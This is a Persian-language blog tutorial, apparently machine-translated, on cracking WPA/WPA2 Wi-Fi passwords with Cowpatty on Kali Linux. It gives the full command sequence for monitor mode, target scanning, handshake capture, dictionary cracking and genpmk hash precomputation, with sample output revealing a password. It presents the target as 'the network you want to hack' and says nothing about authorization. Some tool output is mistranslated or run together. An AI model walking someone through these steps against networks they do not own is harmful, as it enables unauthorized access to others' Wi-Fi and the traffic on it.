برنامه نویسی

نحوه سرعت بخشیدن به فرآیند شکستن رمز WPA/WPA2 با استفاده از Cowpatty

الزامات:

سیستم عامل لینوکس کالی

فایل دست دادن شبکه ای که می خواهید هک کنید.

فهرست لغت.

Cowpatty، توسط Joshua Wright، ابزاری است که حملات فرهنگ لغت آفلاین را برای شکستن پسوردهای WPA2-PSK خودکار می کند. Cowpatty از یک فایل هش از پیش محاسبه شده به جای یک فایل word متن ساده پشتیبانی می کند.

این می تواند فرآیند دریافت کلید WPA/WPA2 “از دست رفته” نقطه دسترسی شما را سرعت بخشد. فایل‌های هش از پیش محاسبه‌شده برای تسریع نیروی رمز عبور هنگام شکستن WPA استفاده می‌شوند.

آنها این کار را با حذف نیاز به تبدیل پرهزینه رمز عبور به یک کلید رمزگذاری انجام می دهند.

کاپتی

برای دریافت خلاصه ای از گزینه ها، cowpatty را در ترمینال تایپ کنید:

گاوچران
cowpatty 4.8 – حمله فرهنگ لغت WPA-PSK. jwright@hasborg.com

Usage: cowpatty [options]

-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-c Check for valid 4-way frames, does not crack
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

کالی لینوکس یک صفحه راهنمای مختصر در اختیار شما قرار می دهد. Cowpatty به تمام موارد زیر نیاز دارد:

**فهرست کلمات.

فایلی که در آن رمز عبور هش گرفته شده است.

SSID AP هدف.
**
آداپتور بی سیم را در حالت مانیتور قرار دهید

باید آداپتور بی سیم را با تایپ کردن در حالت مانیتور قرار دهید

airmon-ng start wlan0
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

(با فرض اینکه نام رابط شما wlan0 باشد).

airmon-ng start wlan0
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

این دستور نام رابط بی سیم شما را به wlan0mon تغییر می دهد.

هدف را پیدا کنید

اسکن روترهای بی سیم اطراف را با استفاده از رابط مانیتور خود شروع کنید:

airodump-ng wlan0mon CH 6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
Enter fullscreen mode

Exit fullscreen mode

Capture the Handshake

Next, you need to start capturing the 4-way handshake file where the hashed password will be stored.

airodump-ng — bssid 28:EF:01:35:34:85 -c 6 -w handshake wlan0mon

Enter fullscreen mode

Exit fullscreen mode

This will start a dump on the selected AP (28:EF:01:35:34:85), on the selected channel (-c 6), and save the hash in a file named handshake.

CH  6][ Elapsed: 4 s ][ 2014-03-24 17:51 ][WPAhandshake:28:EF:01:35:34:85BSSIDPWRRXQBeacons#Data،#/sCHMBENCCIPHERAUTHESSID28:EF:01:35:34:85391005100025WPA25CCMPPSKSkyNetBSSIDSTATIONPWRProbesبستههایگمشده28:EF:01:35:34:8528:EF:01:23:46:68-570-101
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

اگر کسی به AP متصل شود، هش را می‌گیرم و airodump-ng به من نشان می‌دهد که در گوشه بالا سمت راست گرفته شده است (WPA handshake: 28:EF:01:35:34:85).

Run Cowpatty
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

اکنون که هش رمز عبور را دارم، می‌توانم از آن با cowpatty و فهرست کلمات برای شکستن هش استفاده کنم.

cowpatty -f wordlist.txt -r handshake-01.cap -s SkyNet
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

تمام داده های لازم برای نصب کرک در برابر عبارت عبور WPA2/PSK جمع آوری شد.
شروع حمله به فرهنگ لغت. لطفا صبور باشید.
شماره کلید 1000: دختر فرشته
شماره کلید 2000: میسوری
شماره کلید 3000: آواز پرندگان

PSK “justletmein” است.

2000 عبارت عبور تست شده در 294.42 ثانیه: 50000.00 عبارت عبور در ثانیه

Cowpatty در حال ایجاد هش از هر کلمه در لیست کلمات با SSID به عنوان دانه است و آن را با هش ضبط شده مقایسه می کند. هنگامی که هش ها مطابقت دارند، رمز عبور AP را نمایش می دهد. این فرآیند بسیار فشرده و کند است.

Cowpatty اکنون از یک فایل هش از پیش محاسبه شده به جای یک فایل word متن ساده پشتیبانی می کند و شکستن رمز عبور WPA2-PSK را بسیار سریعتر می کند.

شما می توانید هش های خود را برای SSID هدف با استفاده از ابزاری به نام genpmk ایجاد کنید.

genpmk -f wordlist.txt -d hash -s SkyNet
genpmk 1.3 - WPA-PSK precomputation attack. <jwright@hasborg.com>
File cowpatty_dict does not exist, creating.
key no. 1000: pinkgirl
key no. 2000: lovecandy
key no. 3000: steve2006
key no. 4000: honeycow
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

2641 عبارت عبور تست شده در 4.60 ثانیه: 451.00 عبارت عبور در ثانیه

هنگامی که هش را برای SSID خاص ایجاد کردید، سپس می توانید رمز عبور را با cowpatty با تایپ کردن زیر بشکنید:

cowpatty -d hash -r handshake-01.cap -s SkyNet

-d argument is for pre-calculated pmk hash name,

-r is for capture handshake file.

-s is for ESSID network name.
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

نوشته های مشابه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

همچنین ببینید
بستن
دکمه بازگشت به بالا